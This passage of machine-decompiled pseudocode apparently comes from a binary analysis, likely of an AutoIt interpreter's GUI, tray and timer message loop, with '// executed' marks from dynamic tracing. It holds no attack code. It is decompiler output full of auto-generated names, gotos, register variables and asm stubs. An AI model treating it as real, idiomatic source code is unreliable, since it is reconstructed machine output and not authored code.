                                          																				_v324 = L00DD0E2C( *((intOrPtr*)(_v324 + 4)));
                                          																				_push(_v324);
                                          																				goto L211;
                                          																			case 5:
                                          																				__ecx = _v324;
                                          																				__eflags = __ecx;
                                          																				if(__ecx != 0) {
                                          																					__eax = E00E06E7A(__ecx, __ecx);
                                          																				}
                                          																				goto L212;
                                          																			case 6:
                                          																				__eax = _v324;
                                          																				_v356 = __eax;
                                          																				__eflags = __eax;
                                          																				if(__eax == 0) {
                                          																					goto L212;
                                          																				}
                                          																				__ecx = __eax;
                                          																				L210:
                                          																				__eax = E00DB5904(__ecx);
                                          																				_push(_v356);
                                          																				L211:
                                          																				__eax = L00DD0E2C();
                                          																				__esp = __esp + 4;
                                          																				goto L212;
                                          																			case 7:
                                          																				__ecx = _v324;
                                          																				__eflags = __ecx;
                                          																				if(__ecx != 0) {
                                          																					__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
                                          																				}
                                          																				goto L212;
                                          																		}
                                          																	}
                                          																}
                                          																goto L196;
                                          															}
                                          															_t799 = _t799 - 1;
                                          															__eflags = _t799;
                                          															if(_t799 >= 0) {
                                          																goto L196;
                                          															}
                                          															goto L187;
                                          														}
                                          													} else {
                                          														goto L176;
                                          													}
                                          													do {
                                          														L176:
                                          														_t647 =  *((intOrPtr*)( *((intOrPtr*)(_t798 + _t874 * 4))));
                                          														__eflags = _t647 - 0x24;
                                          														if(_t647 == 0x24) {
                                          															L179:
                                          															_t874 = _t874 + 1;
                                          															__eflags = _t874;
                                          															goto L180;
                                          														}
                                          														__eflags = _t647 - 0x1e;
                                          														if(_t647 != 0x1e) {
                                          															goto L180;
                                          														}
                                          														_t838 = 0x100;
                                          														goto L179;
                                          														L180:
                                          														_t648 =  *((intOrPtr*)(_t798 + _t874 * 4));
                                          														__eflags =  *((short*)(_t648 + 8));
                                          													} while ( *((short*)(_t648 + 8)) == 0);
                                          													_v256 = _t838;
                                          													_v288 = _t874;
                                          													goto L182;
                                          													L214:
                                          													_v344 = _v344 + 4;
                                          													_t874 = _t876 + _v328 + 1;
                                          													_t630 = _v340 + 1;
                                          													_v288 = _t874;
                                          													_v340 = _t630;
                                          													__eflags = _t630 -  *((intOrPtr*)(_v332 + 0x14));
                                          												} while (__eflags <= 0);
                                          												goto L215;
                                          											}
                                          											_t841 = _v124 + 8;
                                          											__eflags = _t841;
                                          											_v328 = _t841;
                                          											while(1) {
                                          												_t802 =  *((intOrPtr*)(_t520 + 4));
                                          												_v340 = _t802;
                                          												_t649 =  *((intOrPtr*)(_t802 + _t873 * 4));
                                          												__eflags =  *((short*)(_t649 + 8));
                                          												if( *((short*)(_t649 + 8)) != 0) {
                                          													goto L155;
                                          												}
                                          												L147:
                                          												_t837 =  *(_v304 + 4);
                                          												do {
                                          													_t656 =  *((intOrPtr*)(_t837 + 4 + _t873 * 4));
                                          													__eflags =  *((short*)(_t656 + 8)) - 0x33;
                                          													if( *((short*)(_t656 + 8)) == 0x33) {
                                          														L151:
                                          														_t658 =  *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4))));
                                          														__eflags = _t658 - 0x24;
                                          														if(_t658 == 0x24) {
                                          															goto L153;
                                          														}
                                          														__eflags = _t658 - 0x1e;
                                          														if(_t658 != 0x1e) {
                                          															L167:
                                          															E00E19E4A(_t846, _t931, 0x91,  *((short*)( *((intOrPtr*)( *(_v304 + 4) + 4 + _t873 * 4)) + 0xa)));
                                          															goto L172;
                                          														}
                                          														goto L153;
                                          													}
                                          													__eflags =  *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4)))) -  *_t656;
                                          													if( *((intOrPtr*)( *((intOrPtr*)(_t837 + _t873 * 4)))) ==  *_t656) {
                                          														goto L167;
                                          													}
                                          													_t802 = _v340;
                                          													goto L151;
                                          													L153:
                                          													_t659 =  *((intOrPtr*)(_t802 + 4 + _t873 * 4));
                                          													_t873 = _t873 + 1;
                                          													__eflags =  *((short*)(_t659 + 8));
                                          												} while ( *((short*)(_t659 + 8)) == 0);
                                          												_t841 = _v328;
                                          												L155:
                                          												_t650 =  *((intOrPtr*)(_t802 + 4 + _t873 * 4));
                                          												_t877 = _t873 + 1;
                                          												__eflags =  *((short*)(_t650 + 8)) - 0x41;
                                          												if( *((short*)(_t650 + 8)) != 0x41) {
                                          													L162:
                                          													E00E060EF(_t747,  &_v180,  *_t841);
                                          													_t873 = _t877 + 1;
                                          													_t652 = _v336;
                                          													_t805 = _v268 + 1;
                                          													_t841 = _v332 + 4;
                                          													_v268 = _t805;
                                          													_v332 = _v332 + 4;
                                          													__eflags = _t805 -  *((intOrPtr*)(_t652 + 0x14));
                                          													if(_t805 >=  *((intOrPtr*)(_t652 + 0x14))) {
                                          														_t837 = _v332;
                                          														_v344 = _v176;
                                          														goto L174;
                                          													}
                                          													_t520 = _v304;
                                          													_t802 =  *((intOrPtr*)(_t520 + 4));
                                          													_v340 = _t802;
                                          													_t649 =  *((intOrPtr*)(_t802 + _t873 * 4));
                                          													__eflags =  *((short*)(_t649 + 8));
                                          													if( *((short*)(_t649 + 8)) != 0) {
                                          														goto L155;
                                          													}
                                          													goto L147;
                                          												}
                                          												_t843 = _v340;
                                          												_t877 = _t877 + 1;
                                          												_t806 = 0;
                                          												__eflags = 0;
                                          												while(1) {
                                          													_t655 =  *( *((intOrPtr*)(_t843 + _t877 * 4)) + 8) & 0x0000ffff;
                                          													__eflags = _t655 - 0x47;
                                          													if(_t655 != 0x47) {
                                          														goto L159;
                                          													}
                                          													L158:
                                          													_t806 = _t806 + 1;
                                          													L166:
                                          													_t877 = _t877 + 1;
                                          													_t655 =  *( *((intOrPtr*)(_t843 + _t877 * 4)) + 8) & 0x0000ffff;
                                          													__eflags = _t655 - 0x47;
                                          													if(_t655 != 0x47) {
                                          														goto L159;
                                          													}
                                          													goto L158;
                                          													L159:
                                          													__eflags = _t655 - 0x48;
                                          													if(_t655 != 0x48) {
                                          														__eflags = _t655 - 0x40;
                                          														if(_t655 != 0x40) {
                                          															goto L166;
                                          														}
                                          														__eflags = _t806;
                                          														if(_t806 == 0) {
                                          															L161:
                                          															_t841 = _v328;
                                          															goto L162;
                                          														}
                                          														goto L166;
                                          													}
                                          													_t806 = _t806 - 1;
                                          													__eflags = _t806;
                                          													if(_t806 >= 0) {
                                          														goto L166;
                                          													}
                                          													goto L161;
                                          												}
                                          											}
                                          										}
                                          										L33:
                                          										if( *0xe75930 != 0) {
                                          											__eflags =  *((char*)(_t846 + 0x459)) - 1;
                                          											if(__eflags == 0) {
                                          												goto L34;
                                          											}
                                          											E00DB7667( &(_v216.message), __eflags);
                                          											while(1) {
                                          												_t498 = E00E12408(0xe75890,  &_v216);
                                          												__eflags = _t498;
                                          												if(_t498 == 0) {
                                          													break;
                                          												}
                                          												__eflags = _v216.wParam;
                                          												if(_v216.wParam == 0) {
                                          													continue;
                                          												}
                                          												_t870 = E00DB9E5D(_t846,  &(_v216.message));
                                          												__eflags = _t870;
                                          												if(_t870 == 0) {
                                          													continue;
                                          												}
                                          												_v148 = 0;
                                          												_v140 = 0;
                                          												_v136 = 1;
                                          												E00DB98C0(_t747,  &_v148);
                                          												_v136 = 1;
                                          												_v148 = _v216.hwnd;
                                          												E00DB7DE1(_t747,  &_v96, __eflags, L"@TRAY_ID");
                                          												E00DB89B3(0xe76270, _t837, _t846, __eflags,  &_v100,  &_v152, 1);
                                          												E00DB5904( &_v112);
                                          												 *((char*)(_t846 + 0x459)) = 1;
                                          												E00DBB73C(_t846, _t837, _t931,  *((intOrPtr*)(_t870 + 0x10)) + 1, 1, 0);
                                          												 *((char*)(_t846 + 0x459)) = 0;
                                          												E00DB98C0(_t747,  &_v176);
                                          												_t752 =  &_v240;
                                          												E00DB5904(_t752);
                                          												goto L51;
                                          											}
                                          											_t752 =  &(_v216.message);
                                          											E00DB5904(_t752);
                                          										}
                                          										L34:
                                          										_t494 =  *(_t846 + 0xf8);
                                          										if(_t494 == 7) {
                                          											_t495 = WaitForSingleObject( *(_t846 + 0x444), 0xa);
                                          											_v292 = _t495;
                                          											__eflags = _t495 - 0x102;
                                          											if(__eflags == 0) {
                                          												goto L51;
                                          											}
                                          											GetExitCodeProcess( *(_t846 + 0x444),  &_v292);
                                          											CloseHandle( *(_t846 + 0x444));
                                          											_v356 = _v292;
                                          											L265:
                                          											_push(_t752);
                                          											_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
                                          											E00DCFCD3(_t752,  &_v356);
                                          											L97:
                                          											 *((char*)(_t846 + 0x144)) = 1;
                                          											 *(_t846 + 0xf8) = 0;
                                          											goto L51;
                                          										}
                                          										if(_t494 == 2) {
                                          											L83:
                                          											Sleep(0xa);
                                          											__eflags =  *(_t846 + 0x2f0);
                                          											if( *(_t846 + 0x2f0) == 0) {
                                          												L87:
                                          												_t674 =  *(_t846 + 0xf8);
                                          												__eflags = _t674 - 3;
                                          												if(__eflags < 0) {
                                          													goto L51;
                                          												}
                                          												_t675 = _t674 - 3;
                                          												__eflags = _t675 - 3;
                                          												if(__eflags > 0) {
                                          													goto L51;
                                          												} else {
                                          													switch( *((intOrPtr*)(_t675 * 4 +  &M00DF5D13))) {
                                          														case 0:
                                          															__ecx = __edi;
                                          															__eax = E00DBB7DD(__ecx, __edx, __eflags, __fp0, 1);
                                          															goto L297;
                                          														case 1:
                                          															__ecx = __edi;
                                          															__eax = E00DBB7DD(__ecx, __edx, __eflags, __fp0, 1);
                                          															goto L293;
                                          														case 2:
                                          															_t752 = _t846;
                                          															_t676 = E00E35F25(_t752, _t837, __eflags, _t931);
                                          															L297:
                                          															_t861 = _t676;
                                          															__eflags = _t861;
                                          															if(__eflags >= 0) {
                                          																goto L299;
                                          															}
                                          															goto L298;
                                          														case 3:
                                          															__ecx = __edi;
                                          															__eax = E00E35F25(__ecx, __edx, __eflags, __fp0);
                                          															L293:
                                          															__esi = __eax;
                                          															__eflags = __esi;
                                          															if(__eflags < 0) {
                                          																L298:
                                          																_t827 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
                                          																E00E0652D(_t827,  ~_t861, 0);
                                          																_push(_t827);
                                          																_v364 = 0;
                                          																_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
                                          																_t676 = E00DCFCD3(_t752,  &_v364);
                                          																__eflags = _t861;
                                          																L299:
                                          																if(__eflags == 0) {
                                          																	goto L51;
                                          																}
                                          																__eflags = _t861;
                                          																if(_t861 <= 0) {
                                          																	L304:
                                          																	_t752 =  *(_t846 + 0x2f4);
                                          																	 *((char*)(_t846 + 0x144)) = 1;
                                          																	 *(_t846 + 0xf8) = 0;
                                          																	E00E15244(_t676, _t752, _t931);
                                          																	goto L51;
                                          																}
                                          																L301:
                                          																_t676 =  *(_t846 + 0xf8);
                                          																__eflags = _t676 - 5;
                                          																if(_t676 == 5) {
                                          																	L303:
                                          																	_v164 = 0;
                                          																	_v156 = 0;
                                          																	_v152 = 1;
                                          																	E00DB98C0(_t747,  &_v164);
                                          																	_v152 = 7;
                                          																	_v164 =  *( *(_t846 + 0x1f0));
                                          																	__eflags =  *((intOrPtr*)( *_t846 + 4)) + _t846;
                                          																	E00E064DA( *((intOrPtr*)( *_t846 + 4)) + _t846, _t846,  &_v164, 0);
                                          																	_t676 = E00DB98C0(_t747,  &_v172);
                                          																	goto L304;
                                          																}
                                          																__eflags = _t676 - 3;
                                          																if(_t676 != 3) {
                                          																	goto L304;
                                          																}
                                          																goto L303;
                                          															}
                                          															if(__eflags > 0) {
                                          																goto L51;
                                          															}
                                          															goto L301;
                                          													}
                                          												}
                                          											}
                                          											_t752 =  *(_t846 + 0x2f8);
                                          											_t689 = E00DD049F(_t752);
                                          											__eflags = _t837;
                                          											if(__eflags < 0) {
                                          												goto L87;
                                          											}
                                          											if(__eflags > 0) {
                                          												L96:
                                          												__eflags =  *(_t846 + 0xf8) - 2;
                                          												if(__eflags != 0) {
                                          													_v356 = 0;
                                          													goto L265;
                                          												}
                                          												goto L97;
                                          											}
                                          											__eflags = _t689 -  *(_t846 + 0x2f0);
                                          											if(_t689 >=  *(_t846 + 0x2f0)) {
                                          												goto L96;
                                          											}
                                          											goto L87;
                                          										}
                                          										if(_t494 == 8 || _t494 == 9) {
                                          											Sleep(0xa);
                                          											__eflags =  *(_t846 + 0x43c);
                                          											if( *(_t846 + 0x43c) == 0) {
                                          												L311:
                                          												_t690 =  *(_t846 + 0xf8);
                                          												_t863 = 0;
                                          												_v333 = 0;
                                          												_v356 = 0;
                                          												__eflags = _t690 - 8;
                                          												if(_t690 != 8) {
                                          													__eflags = _t690 - 9;
                                          													if(__eflags != 0) {
                                          														goto L51;
                                          													}
                                          													L315:
                                          													_t752 =  *(_t846 + 0x448);
                                          													_t691 = 0xcccccccc;
                                          													_v300 = 0xcccccccc;
                                          													__eflags = _t752;
                                          													if(_t752 == 0) {
                                          														L319:
                                          														__eflags =  *(_t846 + 0xf8) - 8;
                                          														if( *(_t846 + 0xf8) != 8) {
                                          															_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
                                          															__eflags = _t752;
                                          															E00DCFD21(_t747, _t752, _t691, 0);
                                          														} else {
                                          															_v356 = _t863;
                                          															asm("fild dword [esp+0x8]");
                                          															__eflags = _t863;
                                          															if(__eflags < 0) {
                                          																_t931 = _t931 +  *0xe69e48;
                                          															}
                                          															_push(_t752);
                                          															_v356 = _t931;
                                          															_t752 =  *((intOrPtr*)( *_t846 + 4)) + _t846;
                                          															E00E2C92D(_t747, _t752,  &_v356);
                                          														}
                                          														 *((char*)(_t846 + 0x144)) = 1;
                                          														 *(_t846 + 0xf8) = 0;
                                          														Sleep( *(_t846 + 0x2f4));
                                          														goto L51;
                                          													}
                                          													GetExitCodeProcess(_t752,  &_v300);
                                          													__eflags = _v300 - 0x103;
                                          													if(_v300 != 0x103) {
                                          														L318:
                                          														CloseHandle( *(_t846 + 0x448));
                                          														_t691 = _v300;
                                          														 *(_t846 + 0x448) = 0;
                                          														goto L319;
                                          													}
                                          													__eflags = WaitForSingleObject( *(_t846 + 0x448), 0);
                                          													if(__eflags != 0) {
                                          														goto L51;
                                          													}
                                          													goto L318;
                                          												}
                                          												_t752 = _t846 + 0x42c;
                                          												_t837 =  &_v356;
                                          												E00E13C55(_t752,  &_v356, _t931,  &_v333);
                                          												_t884 = _t884 + 4;
                                          												__eflags = _v333 - 1;
                                          												if(__eflags != 0) {
                                          													goto L51;
                                          												}
                                          												_t863 = _v356;
                                          												goto L315;
                                          											}
                                          											_t752 =  *(_t846 + 0x440);
                                          											_t703 = E00DD049F(_t752);
                                          											__eflags = _t837;
                                          											if(__eflags < 0) {
                                          												goto L311;
                                          											}
                                          											if(__eflags > 0) {
                                          												L309:
                                          												_t704 =  *(_t846 + 0x448);
                                          												__eflags = _t704;
                                          												if(__eflags != 0) {
                                          													CloseHandle(_t704);
                                          													 *(_t846 + 0x448) = 0;
                                          												}
                                          												_v356 = 0;
                                          												goto L265;
                                          											}
                                          											__eflags = _t703 -  *(_t846 + 0x43c);
                                          											if(_t703 <  *(_t846 + 0x43c)) {
                                          												goto L311;
                                          											}
                                          											goto L309;
                                          										} else {
                                          											if(_t494 == 3 || _t494 == 4 || _t494 == 5 || _t494 == 6) {
                                          												goto L83;
                                          											} else {
                                          												_t864 = _a4;
                                          												_a4 = _a4 + 1;
                                          												 *(_t846 + 0xf4) = _t864;
                                          												_t921 = _t864 -  *0xe762a0; // 0x104f
                                          												if(_t921 > 0 || _t864 <= 0) {
                                          													L287:
                                          													 *(_t846 + 0xf8) = 1;
                                          													goto L51;
                                          												} else {
                                          													_t866 = (_t864 << 4) +  *0xe762dc;
                                          													if(_t866 == 0) {
                                          														goto L287;
                                          													}
                                          													_t837 = 0;
                                          													_v284 = 0;
                                          													_v276 = 0;
                                          													_v272 = 1;
                                          													_t707 =  *((intOrPtr*)( *((intOrPtr*)(_t866 + 4))));
                                          													_v356 = _t707;
                                          													_v344 = 0;
                                          													_v332 = 0;
                                          													_t708 =  *((short*)(_t707 + 8));
                                          													if(_t708 != 0) {
                                          														__eflags = _t708 - 0x33;
                                          														if(_t708 != 0x33) {
                                          															_t709 = _t708 - 1;
                                          															__eflags = _t709 - 0x7e;
                                          															if(__eflags > 0) {
                                          																L269:
                                          																_t712 = E00DB9EA0(_t747, _t846, _t931, _t866,  &_v332,  &_v284, 0xffffffff);
                                          																L72:
                                          																__eflags = _t712;
                                          																if(__eflags < 0) {
                                          																	L47:
                                          																	_t867 = _v276;
                                          																	if(_t867 != 0) {
                                          																		 *( *(_t867 + 0xc)) =  *( *(_t867 + 0xc)) - 1;
                                          																		__eflags =  *( *(_t867 + 0xc));
                                          																		if( *( *(_t867 + 0xc)) == 0) {
                                          																			L00DD0E2C( *_t867);
                                          																			L00DD0E2C( *(_t867 + 0xc));
                                          																			_t884 = _t884 + 8;
                                          																		}
                                          																		L00DD0E2C(_t867);
                                          																		_t884 = _t884 + 4;
                                          																		_v276 = 0;
                                          																	}
                                          																	_t837 = _v284;
                                          																	_t752 = _v272;
                                          																	_v344 = _v284;
                                          																	L49:
                                          																	if(_t752 >= 5) {
                                          																		_t752 = _t752 + 0xfffffffb;
                                          																		__eflags = _t752 - 0xa;
                                          																		if(__eflags > 0) {
                                          																			goto L50;
                                          																		}
                                          																		switch( *((intOrPtr*)(_t752 * 4 +  &M00DC1044))) {
                                          																			case 0:
                                          																				__eflags = __edx;
                                          																				if(__eflags != 0) {
                                          																					__ecx = __edx;
                                          																					__eax = E00DB8CD4(__ecx, __edi, __eflags, __ecx);
                                          																				}
                                          																				goto L50;
                                          																			case 1:
                                          																				goto L50;
                                          																			case 2:
                                          																				__eflags = __edx;
                                          																				if(__eflags == 0) {
                                          																					goto L50;
                                          																				}
                                          																				_push(__edx);
                                          																				__imp__#9();
                                          																				_push(_v288);
                                          																				goto L286;
                                          																			case 3:
                                          																				__eflags = __edx;
                                          																				if(__eflags == 0) {
                                          																					goto L50;
                                          																				}
                                          																				__ecx = __edx + 8;
                                          																				goto L285;
                                          																			case 4:
                                          																				__eax = L00DD0E2C( *((intOrPtr*)(__edx + 4)));
                                          																				_push(_v284);
                                          																				goto L286;
                                          																			case 5:
                                          																				__eflags = __edx;
                                          																				if(__eflags != 0) {
                                          																					__ecx = __edx;
                                          																					__eax = E00E06E7A(__ecx, __ecx);
                                          																				}
                                          																				goto L50;
                                          																			case 6:
                                          																				__eflags = __edx;
                                          																				if(__eflags == 0) {
                                          																					goto L50;
                                          																				}
                                          																				__ecx = __edx;
                                          																				L285:
                                          																				__eax = E00DB5904(__ecx);
                                          																				_push(_v344);
                                          																				L286:
                                          																				__eax = L00DD0E2C();
                                          																				__esp = __esp + 4;
                                          																				goto L50;
                                          																			case 7:
                                          																				__eflags = __edx;
                                          																				if(__eflags != 0) {
                                          																					__ecx = __edx;
                                          																					__eax = E00E06E8F(__ebx, __ecx, __edi, __ecx);
                                          																				}
                                          																				goto L50;
                                          																		}
                                          																	}
                                          																	L50:
                                          																	_v272 = 1;
                                          																	_v284 = 0;
                                          																	goto L51;
                                          																}
                                          																_t719 =  *((intOrPtr*)( *((intOrPtr*)(_t866 + 4)) + _v332 * 4));
                                          																__eflags =  *((short*)( *((intOrPtr*)( *((intOrPtr*)(_t866 + 4)) + _v332 * 4)) + 8)) - 0x7f;
                                          																if(__eflags == 0) {
                                          																	goto L47;
                                          																}
                                          																E00E19E4A(_t846, _t931, 0x72,  *((short*)(_t719 + 0xa)));
                                          																_t752 =  &_v292;
                                          																E00DB9C90(_t747, _t752);
                                          																goto L51;
                                          															}
                                          															_t63 = _t709 + 0xdc0fc4; // 0x4040000
                                          															switch( *((intOrPtr*)(( *_t63 & 0x000000ff) * 4 +  &M00DC0FB0))) {
                                          																case 0:
                                          																	_t712 = E00DBF460(_t747, _t846, _t931, 0, _t866,  &_v332,  &_v284); // executed
                                          																	goto L72;
                                          																case 1:
                                          																	__eax =  &_v257;
                                          																	__ecx = __edi;
                                          																	 &_v284 =  &_v332;
                                          																	__eax = E00DBFCE0(__ecx, __fp0, 0, __esi,  &_v332,  &_v284,  &_v257); // executed
                                          																	goto L72;
                                          																case 2:
                                          																	__ecx = __edi + 0x168;
                                          																	__ecx = E00E2BFE2(__edi + 0x168);
                                          																	__eax = E00E05FCD(__eax);
                                          																	__eflags = __al;
                                          																	if(__al != 0) {
                                          																		__ecx = __edi + 0x168;
                                          																		E00E2BFE2(__edi + 0x168) =  &_v332;
                                          																		__ecx = __edi;
                                          																		__eax = E00E2B53C(__ecx, __edx, __fp0, __esi,  &_v332,  &_v332);
                                          																		goto L72;
                                          																	}
                                          																	__eax = _v356;
                                          																	__ecx = __edi;
                                          																	 *((short*)(_v356 + 0xa)) = E00E19E4A(__edi, __fp0, 0xa7,  *((short*)(_v356 + 0xa)));
                                          																	__ecx =  &_v292;
                                          																	__eax = E00DB9C90(__ebx, __ecx);
                                          																	goto L51;
                                          																case 3:
                                          																	goto L49;
                                          																case 4:
                                          																	goto L269;
                                          															}
                                          														}
                                          														E00DBE6A0(_t846, _t931, _t866); // executed
                                          														goto L47;
                                          													}
                                          													E00DBE420(_t846, _t931, _t866,  &_a4); // executed
                                          													goto L47;
                                          												}
                                          											}
                                          										}
                                          									} else {
                                          										_t906 =  *0xe757e8 - 1;
                                          										if( *0xe757e8 != 1) {
                                          											_v216.wParam = 0;
                                          											_v216.lParam = 8;
                                          											_t22 = 8 * _t837;
                                          											_t837 = 8 * _t837 >> 0x20;
                                          											_t541 = E00DD0DB6(_t747, _t846, _t906,  ~(0 | _t906 > 0x00000000) | _t22);
                                          											_v216.message = _t541;
                                          											_t752 = 0;
                                          											 *_t541 = 0;
                                          											_t542 = E00DD0DB6(_t747, _t846, _t906, 4);
                                          											_t884 = _t884 + 8;
                                          											if(_t542 == 0) {
                                          												_t542 = 0;
                                          											} else {
                                          												 *_t542 = 1;
                                          											}
                                          											_v192 = _t542;
                                          											while( *0xe757dc != 0) {
                                          												_t543 =  *0xe757e0; // 0x0
                                          												_t868 =  *_t543;
                                          												E00E36018( &(_v216.wParam), _t868);
                                          												_t752 = 0xe757dc;
                                          												E00E13176(0xe757dc);
                                          												__eflags = _t868;
                                          												if(_t868 != 0) {
                                          													_t752 = _t868;
                                          													E00E36098(_t752, 0xe757dc);
                                          												}
                                          												__eflags = _v216.time;
                                          												 *0xe76420 = 0;
                                          												if(__eflags == 0) {
                                          													continue;
                                          												} else {
                                          													_t752 = _t846;
                                          													_t549 = E00DB9E5D(_t752,  &(_v216.lParam));
                                          													_t878 = _t549;
                                          													__eflags = _t549;
                                          													if(__eflags == 0) {
                                          														continue;
                                          													}
                                          													_v244 = 0;
                                          													_v236 = 0;
                                          													_v232 = 1;
                                          													E00DB98C0(_t747,  &_v244);
                                          													_v232 = 1;
                                          													_v244 = _v216.wParam;
                                          													E00DB7DE1(_t747,  &_v56, __eflags, L"@GUI_CTRLID");
                                          													E00DB89B3(0xe76270, _t837, _t846, __eflags,  &_v60,  &_v248, 1);
                                          													E00DB5904( &_v72);
                                          													E00DB98C0(_t747,  &_v260);
                                          													_v248 = 7;
                                          													_v260 = _v216.lParam;
                                          													E00DB7DE1(_t747,  &_v120, __eflags, L"@GUI_WINHANDLE");
                                          													E00DB89B3(0xe76270, _t837, _t846, __eflags,  &_v124,  &_v264, 1);
                                          													E00DB5904( &_v136);
                                          													E00DB98C0(_t747,  &_v276);
                                          													_v264 = 7;
                                          													_v276 = _v216.hwnd;
                                          													E00DB7DE1(_t747,  &_v104, __eflags, L"@GUI_CTRLHANDLE");
                                          													E00DB89B3(0xe76270, _t837, _t846, __eflags,  &_v108,  &_v280, 1);
                                          													E00DB5904( &_v120);
                                          													 *((char*)(_t846 + 0x458)) = 1;
                                          													E00DBB73C(_t846, _t837, _t931,  *((intOrPtr*)(_t878 + 0x10)) + 1, 1, 0);
                                          													 *((char*)(_t846 + 0x458)) = 0;
                                          													E00DB98C0(_t747,  &_v304);
                                          													_t752 =  &_v264;
                                          													E00DB5904(_t752);
                                          													goto L51;
                                          												}
                                          											}
                                          											if( *0xe757bc == 0) {
                                          												__eflags =  *0xe7591c;
                                          												if(__eflags != 0) {
                                          													L141:
                                          													_push(0xa);
                                          													L142:
                                          													Sleep();
                                          													goto L30;
                                          												}
                                          												__eflags =  *0xe76420 - 0x64;
                                          												if(__eflags >= 0) {
                                          													goto L141;
                                          												}
                                          												 *0xe76420 =  &( *0xe76420->i);
                                          												_push(0);
                                          												goto L142;
                                          											}
                                          											L30:
                                          											_t869 = _v192;
                                          											 *_t869 =  *_t869 - 1;
                                          											if( *_t869 == 0) {
                                          												L00DD0E2C(_v216.lParam);
                                          												L00DD0E2C(_t869);
                                          												_t884 = _t884 + 8;
                                          											}
                                          										}
                                          										goto L32;
                                          									}
                                          								} else {
                                          									_t879 =  *((intOrPtr*)(_t846 + 0x44c));
                                          									 *0xe7641c = 1;
                                          									_v344 = 0;
                                          									_v356 = _t846 + 0x44c;
                                          									L16:
                                          									L16:
                                          									if(_t879 != 0) {
                                          										goto L57;
                                          									} else {
                                          										_t849 = _v356;
                                          										goto L18;
                                          									}
                                          									while(1) {
                                          										L18:
                                          										_t578 =  *_t849;
                                          										while(1) {
                                          											L19:
                                          											_v340 = _t578;
                                          											if(_t578 == 0) {
                                          												break;
                                          											}
                                          											_t752 =  *_t578;
                                          											__eflags =  *((char*)(_t752 + 0x11));
                                          											if(__eflags != 0) {
                                          												_t752 = _t849;
                                          												E00E1A188(_t752,  &_v340);
                                          												L18:
                                          												_t578 =  *_t849;
                                          												continue;
                                          											}
                                          											_t578 =  *(_t578 + 4);
                                          										}
                                          										_t846 = _v296;
                                          										 *0xe7641c = _t578;
                                          										if(_v344 > _t578) {
                                          											goto L51;
                                          										} else {
                                          											_t18 = _t578 + 2; // 0x2
                                          											_t837 = _t18;
                                          											goto L22;
                                          										}
                                          									}
                                          									L57:
                                          									_t577 =  *_t879;
                                          									__eflags =  *((char*)(_t577 + 0x11));
                                          									if(__eflags != 0) {
                                          										L64:
                                          										_t879 =  *((intOrPtr*)(_t879 + 4));
                                          										goto L16;
                                          									}
                                          									_t850 =  *((intOrPtr*)(_t577 + 0x14));
                                          									_t599 = timeGetTime();
                                          									_t752 = _t599;
                                          									_t837 = 0;
                                          									_t600 = _t599 - _t850;
                                          									__eflags = _t850 - 0x7fffffff;
                                          									if(_t850 > 0x7fffffff) {
                                          										__eflags = _t752 - 0x7fffffff;
                                          										if(_t752 <= 0x7fffffff) {
                                          											L61:
                                          											_t851 =  *_t879;
                                          											__eflags = _t837;
                                          											if(__eflags < 0) {
                                          												goto L64;
                                          											}
                                          											if(__eflags > 0) {
                                          												L98:
                                          												_v344 =  &(_v344->i);
                                          												 *((intOrPtr*)(_t851 + 0x14)) = timeGetTime();
                                          												_t602 = E00DB9E5D(_v296,  *_t879);
                                          												 *((char*)( *_t879 + 0x10)) = 1;
                                          												_t752 = _v300;
                                          												E00DBB73C(_t752, _t837, _t931,  *((intOrPtr*)(_t602 + 0x10)) + 1, 1, 0);
                                          												 *((char*)( *_t879 + 0x10)) = 0;
                                          												goto L64;
                                          											}
                                          											__eflags = _t600 -  *((intOrPtr*)(_t851 + 0x18));
                                          											if(__eflags >= 0) {
                                          												goto L98;
                                          											}
                                          											goto L64;
                                          										}
                                          										L60:
                                          										asm("cdq");
                                          										goto L61;
                                          									}
                                          									__eflags = _t752 - 0x7fffffff;
                                          									if(_t752 > 0x7fffffff) {
                                          										goto L61;
                                          									}
                                          									goto L60;
                                          								}
                                          							}
                                          						}
                                          						if( *0xe757e8 != 0) {
                                          							__eflags =  *(_t846 + 0xf8);
                                          							if(__eflags == 0) {
                                          								goto L11;
                                          							}
                                          						}
                                          						if(PeekMessageW( &_v216, 0, 0, 0, 1) != 0) {
                                          							while(1) {
                                          								__eflags = _v216.message - 0x12;
                                          								if(__eflags == 0) {
                                          									break;
                                          								}
                                          								_t778 =  *0xe757d8; // 0xffffffff
                                          								__eflags = _t778 - 0xffffffff;
                                          								if(_t778 != 0xffffffff) {
                                          									__eflags = _t778 -  *0xe75814; // 0x0
                                          									if(__eflags >= 0) {
                                          										L116:
                                          										 *0xe757d8 = 0xffffffff;
                                          										goto L80;
                                          									}
                                          									_t594 =  *0xe75810; // 0x0
                                          									_t752 =  *(_t594 + _t778 * 4);
                                          									_t595 =  *_t752;
                                          									__eflags = _t595;
                                          									if(_t595 == 0) {
                                          										goto L116;
                                          									}
                                          									__eflags =  *(_t595 + 0x18);
                                          									if( *(_t595 + 0x18) == 0) {
                                          										goto L116;
                                          									}
                                          									_t598 = TranslateAcceleratorW( *( *_t752),  *( *_t752 + 0x18),  &_v216);
                                          									__eflags = _t598;
                                          									if(_t598 != 0) {
                                          										L81:
                                          										__eflags = PeekMessageW( &_v216, 0, 0, 0, 1);
                                          										if(__eflags == 0) {
                                          											goto L8;
                                          										}
                                          										continue;
                                          									}
                                          								}
                                          								L80:
                                          								_t752 = 0xe757b0;
                                          								_t587 = E00DB31CE(0xe757b0,  &_v216);
                                          								__eflags = _t587;
                                          								if(_t587 == 0) {
                                          									TranslateMessage( &_v216);
                                          									DispatchMessageW( &_v216); // executed
                                          								}
                                          								goto L81;
                                          							}
                                          							 *((char*)(_t846 + 0xfc)) = 1;
                                          							 *(_t846 + 0xf8) = 1;
                                          						}
                                          						L8:
                                          						if( *0xe75282 == 1) {
                                          							 *0xe75287 = 0;
                                          							 *0xe75282 = 0;
                                          							 *(_t846 + 0xf8) = 1;
                                          						}
                                          						if( *(_t846 + 0xf8) == 1) {
                                          							_push(_t752);
                                          							_v292 = 0;
                                          							E00DCFCD3( *((intOrPtr*)( *_t846 + 4)) + _t846,  &_v292);
                                          							goto L53;
                                          						} else {
                                          							_t837 = 2;
